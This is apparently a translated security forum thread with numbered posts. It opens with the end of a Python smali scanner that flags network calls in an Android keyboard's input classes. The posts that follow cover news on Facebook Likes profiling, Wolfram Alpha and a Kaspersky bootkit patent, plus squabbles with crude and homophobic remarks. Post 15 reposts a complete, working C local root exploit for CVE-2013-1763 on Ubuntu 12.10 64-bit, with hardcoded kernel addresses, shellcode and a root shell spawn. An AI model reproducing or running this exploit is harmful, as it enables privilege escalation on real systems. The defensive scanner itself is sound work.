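        params.append(params_str[start:i])
    return params, ret


def register_layout(locals_count, desc, is_static=False):
    """Map p-registers onto the v-numbering that follows the .locals block.

    Instance methods get an implicit 'this' in p0; static methods do not.
    Wide parameters (J, D) consume two consecutive registers."""
    params, _ = parse_descriptor(desc)
    layout, v, p = {}, locals_count, 0
    if not is_static:
        layout["p0"] = f"v{v}"
        v, p = v + 1, p + 1
    for t in params:
        for _ in range(2 if t in WIDE else 1):
            layout[f"p{p}"] = f"v{v}"
            v, p = v + 1, p + 1
    return layout


# Class-name prefixes of APIs that move data off the device (assumed list).
NETWORK_SINKS = (
    "Lorg/apache/http/",
    "Ljava/net/HttpURLConnection;",
    "Ljava/net/URL;",
    "Ljava/net/Socket;",
)
# Substring that marks classes handling keyboard input in this package layout.
INPUT_CLASS_HINT = "inputeventmodel/events/"


def find_network_sinks(smali_text):
    """Return sorted, de-duplicated (class, method, sink) triples for every
    network API referenced from a class under the input-event package.
    A keyboard's input-event classes have no business opening sockets, so
    any hit here is where a review of a sideloaded APK should start."""
    hits, cls, method = set(), None, None
    for line in smali_text.splitlines():
        line = line.strip()
        if line.startswith(".class"):
            cls = line.split()[-1]
        elif line.startswith(".method"):
            method = line.split()[-1]
        elif line.startswith(".end method"):
            method = None
        elif line.startswith(("invoke-", "new-instance", "const-class")):
            for sink in NETWORK_SINKS:
                if sink in line and cls and INPUT_CLASS_HINT in cls:
                    hits.add((cls, method, sink))
    return sorted(hits)


# Constructed sample (not SwiftKey's smali): an inner class after the post's
# search-and-replace renaming, doing an HTTP POST from doInBackground.
SAMPLE_SMALI = """\
.class public Lcom/touchtype/keyboard/inputeventmodel/events/KeyInputEvent$AsyncHttpPost;
.super Landroid/os/AsyncTask;

.method protected varargs doInBackground([Ljava/lang/String;)Ljava/lang/String;
    .locals 9
    new-instance v1, Lorg/apache/http/impl/client/DefaultHttpClient;
    invoke-direct {v1}, Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V
    new-instance v3, Lorg/apache/http/client/methods/HttpPost;
    const/4 v7, 0x0
    aget-object v7, p1, v7
    invoke-direct {v3, v7}, Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V
    return-object v7
.end method
"""

if __name__ == "__main__":
    print(register_layout(6, "(Landroid/os/Bundle;)V"))
    for cls, method, sink in find_network_sinks(SAMPLE_SMALI):
        print(f"{cls} {method} -> {sink}")
```

The scan is string-based on purpose: it runs over the output of apktool's source-only decompile without needing a dex parser, and the sink list is an assumption to extend (for instance with Ljava/net/ classes the app legitimately uses elsewhere, which is why the hit is tied to the input-event package rather than to the whole APK). The register helper is what you would use to sanity-check the post's "set locals 0 to locals 6" step before recompiling, since a method whose .locals value is too small for the registers it touches fails to assemble.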
  13. [h=1]How advertisers find out everything about a user just from the Likes given on Facebook[/h]

by Redactia Hit | 12 March 2013

Countless studies have shown that Facebook is, beyond the communication and social networking phenomenon, a real gold mine for advertisers, who can target the public according to their activities on the social network. Moreover, researchers have demonstrated that the simple Likes you give on the social network can reveal so much data that they can lead to a real portrait of the user's personality.

Researchers from the University of Cambridge together with Microsoft Research have demonstrated that, using the MyPersonality application, those interested in users' behaviour on the social network can build a veritable identikit of the users. Quite frightening is the fact that this can be done just by following the Likes someone gives on Facebook and nothing more. The researchers say that Facebook Likes are the richest source of information about users. Just by following Likes, the researchers were able to establish users' gender and ethnicity, as well as their political and religious convictions. The accuracy of the data obtained by following users' Likes is 80%.

Sources: The Verge, The Wall Street Journal

Via: How advertisers find out everything about a user just from the Likes given on Facebook | Hit.ro
  14. [h=1]Wolfram Alpha, the brain behind Siri, will become even smarter[/h]

Dorian Prodan - 12 Mar 2013

Stephen Wolfram, the British researcher behind the Mathematica and Wolfram Alpha projects, announced at the SXSW conference that the impressive computational algorithms behind these services will see radical improvements in the near future, gaining a prediction capability that will simplify their use.

For those less familiar with Wolfram Alpha, it is a computational platform which, based on tens of thousands of billions of data types aggregated from different sources and on tens of thousands of different mathematical algorithms developed over three decades, offers not trivial results, like an ordinary search engine, but complex answers. The most famous product that uses the Wolfram Alpha algorithms is Apple's Siri voice assistant, but the company offers a wide range of applications for mobile platforms that allow generic or specialised use of its services. All these products have one big problem, however: they are rather difficult to use, because users don't always know ex exactly what they want to find out.

To get past this ergonomic handicap, Stephen Wolfram announced that Wolfram Alpha will receive a series of software routines for analysing the data specified or entered by users, allowing it to anticipate the questions they will ask and to offer answers without requiring a cumbersome syntax. One example given by Stephen Wolfram is that of augmented reality applications, which will be able to analyse the surrounding environment, recognise nearby points of interest and offer additional data about them. Other uses will be less spectacular, such as the automatic analysis of the data in a spreadsheet chosen by the user, but all are part of the same campaign around the way the service is used.

All these options will be launched in the near future within the applications for mobile devices, in the form of a subscription. With this update, the Mathematica platform will also become available through applications on mobile devices.

Source: Wolfram Alpha, the brain behind Siri, will become even smarter
  15. CVE-2013-1763 Ubuntu 12.10 64bit
    From: Kacper Szczesniak <kacper () qwe pl>
    Date: Mon, 11 Mar 2013 15:50:03 +0100

    Hi All,
    Didn't find a working poc for 64bit Ubuntu so I wrote a quick mockup.
    kacper

    Attachment: a.c

```c
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3))) x()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main()
{
    int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0) {
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    /* Ubuntu 12.10 x86_64 */
    req.r.sdiag_family = 0x37;
    commit_creds = (_commit_creds) 0xffffffff8107d180;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;

    mmap_start = 0x1a000;
    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

    send(fd, &req, sizeof(req), 0);
    if(!getuid()) system("/bin/sh");
}
```

    Source: Full Disclosure: CVE-2013-1763 Ubuntu 12.10 64bit
  16. Ok, we're closing the topic and we're done with the nonsense.
  17. How gay do you have to be to advertise yourselves here?
  18. Nytro

    RST Courses

    Man, they were held and there were only a few interested people, so why the fuck are you complaining?
  19. That's exactly what's nice about it, that you can test in a real environment. Yes, it's not exactly "safe" for the site, but I think people understand its usefulness and won't do anything stupid... Plus you get a shell (ksh) directly in the interface, the kernel is old so it can probably be rooted easily, but why would people abuse something nice and very useful? It's not exactly ethical.
  20. [h=1]Kaspersky Lab has patented the technology that detects and removes bootkits[/h] Kaspersky Lab has patented a technology that detects bootkits and implements the security measures needed to prevent them. This technology is created specifically to combat one of the most dangerous threats computers face: bootkits, which run on the system without the user noticing, activating before the operating system and the antivirus.
  21. Listen up.
  22. Come on man, you get a shell directly on the site: Execute korn, ksh shell online. FFS, the site can be very useful, don't abuse it.
  23. There should be one everywhere, or each person should impose one on themselves if they work alone, which is called a "coding style", and it includes comments too. For example, every function should have a comment above it that briefly explains what it does and what each parameter represents. Yes, you may say it's not needed for simple functions, but when you run into a function with 15 parameters you need to know what each one does so you don't waste 2 hours understanding the function. And comments help you first of all, when you re-read your code; at least they help me a lot, and I'd even say I write rather a lot of comments, but I don't think it hurts. Example:

```cpp
///////////////////////////////////////////////////////////////////////////
/// @brief This function does something clever
/// @retval And returns the magic number
/// @param [in] p_nNumar Some number
/// @param [out] p_pcoutBuffer A buffer of size X
///////////////////////////////////////////////////////////////////////////
int Functie(int p_nNumar, char *p_pcoutBuffer)
{
    ...
}
```

    This is roughly the doxygen style, which can generate superb HTML documentation.
  24. [h=2]Podcast: CanSecWest Founder Dragos Ruiu Talks Pwn2Own, Hacker Culture[/h] What's the connection between British hacker Daniel Cuthbert and the annual Pwn2Own challenge? CanSecWest organizer and security industry "dinosaur" Dragos Ruiu explains why Pwn2Own was created and shares his thoughts on the evolution of hacking and exploit writing. [h=3]CanSecWest Founder Dragos Ruiu Talks Pwn2Own, Hacker Culture (19:04)[/h] Download the MP3. Date: March 8, 2013. By: SecurityWeek. Source: Podcast: CanSecWest Founder Dragos Ruiu Talks Pwn2Own, Hacker Culture | SecurityWeek.Com